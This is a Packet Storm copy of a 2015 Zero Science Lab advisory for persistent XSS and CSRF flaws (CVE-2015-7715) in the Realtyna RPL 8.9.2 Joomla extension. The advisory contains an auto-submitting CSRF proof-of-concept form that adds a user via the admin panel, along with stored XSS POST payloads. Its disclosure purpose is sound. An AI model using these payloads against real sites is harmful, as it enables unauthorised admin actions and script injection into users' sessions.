Realtyna RPL 8.9.2 CSRF / Cross Site Scripting

🗓️ 23 Oct 2015 00:00:00Reported by zeroscience.mkType

packetstorm🔗 packetstormsecurity.com👁 31 Views

Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities, impacting Realtyna CRM add-on for RPL, allowing CSRF attacks and multiple cross-site scripting vulnerabilities

Reporter	Title	Published	Views	Family All 11
0day.today	Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities	23 Oct 201500:00	–	zdt
Circl	CVE-2015-7715	23 Oct 201500:00	–	circl
CNVD	Joomla! Realtyna RPL (com_rpl) component cross-site request forgery vulnerability	26 Oct 201700:00	–	cnvd
CVE	CVE-2015-7715	18 Oct 201718:00	–	cve
Cvelist	CVE-2015-7715	18 Oct 201718:00	–	cvelist
Exploit DB	Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery	23 Oct 201500:00	–	exploitdb
EUVD	EUVD-2015-7615	7 Oct 202500:30	–	euvd
exploitpack	Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting Cross-Site Request Forgery	23 Oct 201500:00	–	exploitpack
NVD	CVE-2015-7715	18 Oct 201718:29	–	nvd
Prion	Cross site request forgery (csrf)	18 Oct 201718:29	–	prion

`Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities  
  
  
Vendor: Realtyna LLC  
Product web page: https://www.realtyna.com  
Affected version: 8.9.2  
  
Summary: Realtyna CRM (Client Relationship Management) Add-on  
for RPL is a Real Estate CRM specially designed and developed  
based on business process and models required by Real Estate  
Agents/Brokers. Realtyna CRM intends to increase the Conversion  
Ratio of the website Visitors to Leads and then Leads to Clients.  
  
  
Desc: The application allows users to perform certain actions  
via HTTP requests without performing any validity checks to  
verify the requests. This can be exploited to perform certain  
actions with administrative privileges if a logged-in user visits  
a malicious web site. Multiple cross-site scripting vulnerabilities  
were also discovered. The issue is triggered when input passed  
via the multiple parameters is not properly sanitized before  
being returned to the user. This can be exploited to execute  
arbitrary HTML and script code in a user's browser session in  
context of an affected site.  
  
Tested on: Apache  
PHP/5.4.38  
MySQL/5.5.42-cll  
  
Vulnerability discovered by Bikramaditya 'PhoenixX' Guha  
  
  
Advisory ID: ZSL-2015-5271  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php  
Vendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog  
CVE ID: CVE-2015-7715  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715  
  
  
05.10.2015  
  
--  
  
  
1. CSRF:  
  
<html lang="en">  
<head>  
<title>CSRF POC</title>  
</head>  
<body>  
<form action="http://localhost/administrator/index.php" id="formid" method="post">  
<input type="hidden" name="option" value="com_rpl" />  
<input type="hidden" name="view" value="addon_membership_members" />  
<input type="hidden" name="format" value="ajax" />  
<input type="hidden" name="function" value="add_user" />  
<input type="hidden" name="id" value="85" />  
</form>  
<script>  
document.getElementById('formid').submit();  
</script>  
</body>  
</html>  
  
  
2. Cross Site Scripting (Stored):  
  
http://localhost/administrator/index.php  
POST parameters: new_location_en_gb, new_location_fr_fr  
  
Payloads:  
  
option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location  
option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location  
`